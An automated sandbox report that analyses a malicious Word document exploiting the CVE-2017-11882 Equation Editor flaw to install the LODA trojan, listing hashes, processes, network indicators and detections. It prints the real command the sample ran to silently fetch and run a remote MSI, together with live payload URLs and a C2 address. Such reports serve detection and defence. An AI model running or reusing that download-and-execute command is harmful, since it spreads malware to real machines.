analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

f243c45555ceff495a40976962bbd848.docx

Full analysis: https://app.any.run/tasks/f07dc946-6072-4326-83bc-148f1e9ec34d
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: February 19, 2019, 02:15:58
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
generated-doc
exploit
CVE-2017-11882
exe-to-msi
loader
evasion
trojan
loda
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

F243C45555CEFF495A40976962BBD848

SHA1:

30319BA547CB2BB22B0DBC94C9E912C0881CEB21

SHA256:

306B633F3A80279283A63A723528E58CD5AE9FC4ECEBCE42C0F8BF5BF876AE6D

SSDEEP:

192:X6mmr3Wo4CummortbqD7l3D6n9mS0d2H3ywyuGBmfDZCRTdIQH5vWiF5MbfN:X6ma3WPTmmYbs7hD4mddM31TGyowE5c1

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 2872)

    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 3572)

    • Changes the autorun value in the registry

      • MSIC2D6.tmp (PID: 2868)

    • Downloads executable files from the Internet

      • msiexec.exe (PID: 3136)

    • Connects to CnC server

      • MSIC2D6.tmp (PID: 2868)

    • LODA was detected

      • MSIC2D6.tmp (PID: 2868)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 2872)

    • Unusual connect from Microsoft Office

      • WINWORD.EXE (PID: 2936)

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3136)
      • MSIC2D6.tmp (PID: 2868)

    • Drop ExeToMSI Application

      • msiexec.exe (PID: 3136)

    • Creates files in the user directory

      • MSIC2D6.tmp (PID: 2868)

    • Reads Internet Cache Settings

      • rundll32.exe (PID: 3456)

    • Uses RUNDLL32.EXE to load library

      • MSIC2D6.tmp (PID: 2868)

    • Executes scripts

      • MSIC2D6.tmp (PID: 2868)

    • Connects to unusual port

      • MSIC2D6.tmp (PID: 2868)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2936)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2936)

    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3136)

    • Starts application with an unusual extension

      • msiexec.exe (PID: 3136)

    • Application was crashed

      • EQNEDT32.EXE (PID: 2872)

    • Application was dropped or rewritten from another process

      • MSIC2D6.tmp (PID: 2868)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docx | Word Microsoft Office Open XML Format document (52.2)
.zip | Open Packaging Conventions container (38.8)
.zip | ZIP compressed archive (8.8)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0x2c2fab17
ZipCompressedSize: 350
ZipUncompressedSize: 1364
ZipFileName: [Content_Types].xml

XML

Template: template.dotx
TotalEditTime: 1 minute
Pages: 1
Words: -
Characters: 1
Application: Microsoft Office Word
DocSecurity: None
Lines: 1
Paragraphs: 1
ScaleCrop: No
HeadingPairs:
  • Title
  • 1
TitlesOfParts: -
Company: -
LinksUpToDate: No
CharactersWithSpaces: 1
SharedDoc: No
HyperlinksChanged: No
AppVersion: 15
Keywords: -
LastModifiedBy: Richard
RevisionNumber: 2
CreateDate: 2019:02:18 12:39:00Z
ModifyDate: 2019:02:18 12:39:00Z

XMP

Title: -
Subject: -
Creator: msword
Description: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
9
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start winword.exe eqnedt32.exe cmd.exe no specs msiexec.exe no specs msiexec.exe eqnedt32.exe no specs #LODA msic2d6.tmp rundll32.exe no specs wscript.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2936"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\f243c45555ceff495a40976962bbd848.docx"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2872"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
3572cmd.exe & /C CD C: & msiexec.exe /i http://amazonvietnampharma.com.vn/l/css/baxcit.msi /quiet C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
4036msiexec.exe /i http://amazonvietnampharma.com.vn/l/css/baxcit.msi /quiet C:\Windows\system32\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3136C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2580"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEsvchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2868"C:\Windows\Installer\MSIC2D6.tmp"C:\Windows\Installer\MSIC2D6.tmp
msiexec.exe
User:
admin
Integrity Level:
MEDIUM
Version:
3, 3, 8, 1
3456"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\WININET.dll",DispatchAPICall 1 C:\Windows\system32\rundll32.exeMSIC2D6.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3220WSCript C:\Users\admin\AppData\Local\Temp\ZKKRUH.vbsC:\Windows\system32\WSCript.exeMSIC2D6.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Version:
5.8.7600.16385
Total events
1 966
Read events
1 184
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
27
Text files
18
Unknown types
6

Dropped files

PID
Process
Filename
Type
2936WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6D12.tmp.cvr
MD5:
SHA256:
2936WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{CC0561E0-7164-44AE-9F13-772D979B6FA5}
MD5:
SHA256:
2936WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{57306285-5227-40C7-B590-E49D55C4FCF2}
MD5:
SHA256:
2936WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{192F4391-1CD7-4A2D-9606-7D57D831A0E6}.FSDbinary
MD5:663795DE74320BDEB52A2AD91A154E7E
SHA256:293A0BF23B3759D26175B7C1BE3686B086E0D347868D95743E613CB1B4E448D7
2936WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$43c45555ceff495a40976962bbd848.docxpgc
MD5:193F23DF0F197FA09852D4850EF4FEBF
SHA256:F1468DBF2592C5BD4DC0E544A490E4038665EED859E090BD108C6345D0BF71C5
2936WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSDbinary
MD5:6BB50E53B47E3CDFEB459B723E97F49B
SHA256:15C3BD73F9BD3ACC04113D7FCD06122FA2BF038F7FBECA96A325C82B467EEA42
2936WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:6B01A4399B399324F54D1B8A2E65AF4E
SHA256:2053FC6E06AD503565098797E40EDDF8CC5E6604C5164B385EF69A4E5CF81581
2936WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSFbinary
MD5:6B7A5B4968F00BF0C14451424643C857
SHA256:67482E2C06F2A321E0B47C771DA97711074E71D56AC55885BB02E88F47FC210F
2936WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSDbinary
MD5:0DDA2DCB5DE646247056D5E01C872AF3
SHA256:8C2D844A85DD1CE12FD0A45A85FCE50DD9BCA533D816635800D63651E2038704
3136msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF5A02F0AD5BCF9BEB.TMP
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
7
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2936
WINWORD.EXE
HEAD
200
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/update.doc
VN
suspicious
2936
WINWORD.EXE
GET
200
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/update.doc
VN
text
56.5 Kb
suspicious
2936
WINWORD.EXE
OPTIONS
405
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/
VN
html
231 b
suspicious
980
svchost.exe
OPTIONS
405
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css
VN
html
230 b
suspicious
2936
WINWORD.EXE
HEAD
200
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/update.doc
VN
compressed
56.5 Kb
suspicious
3136
msiexec.exe
GET
200
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/baxcit.msi
VN
executable
444 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2936
WINWORD.EXE
115.146.122.229:80
amazonvietnampharma.com.vn
CMC Telecommunications Services Company
VN
suspicious
3136
msiexec.exe
115.146.122.229:80
amazonvietnampharma.com.vn
CMC Telecommunications Services Company
VN
suspicious
980
svchost.exe
115.146.122.229:80
amazonvietnampharma.com.vn
CMC Telecommunications Services Company
VN
suspicious
2868
MSIC2D6.tmp
91.231.84.41:15705
Ukrainian Internet Names Center LTD
UA
malicious
2868
MSIC2D6.tmp
104.25.209.99:443
ipapi.co
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
amazonvietnampharma.com.vn
  • 115.146.122.229
suspicious
ipapi.co
  • 104.25.209.99
  • 104.25.210.99
shared

Threats

PID
Process
Class
Message
3136
msiexec.exe
Potential Corporate Privacy Violation
SUSPICIOUS [PTsecurity] Executable application_x-msi Download
3136
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
3136
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable ExeToMSI Download
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (ipapi .co in DNS lookup)
2868
MSIC2D6.tmp
A Network Trojan was detected
MALWARE [PTsecurity] Loda Logger CnC Request
2868
MSIC2D6.tmp
A Network Trojan was detected
MALWARE [PTsecurity] Loda Logger CnC Beacon
4 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
f243c45555ceff495a40976962bbd848.docx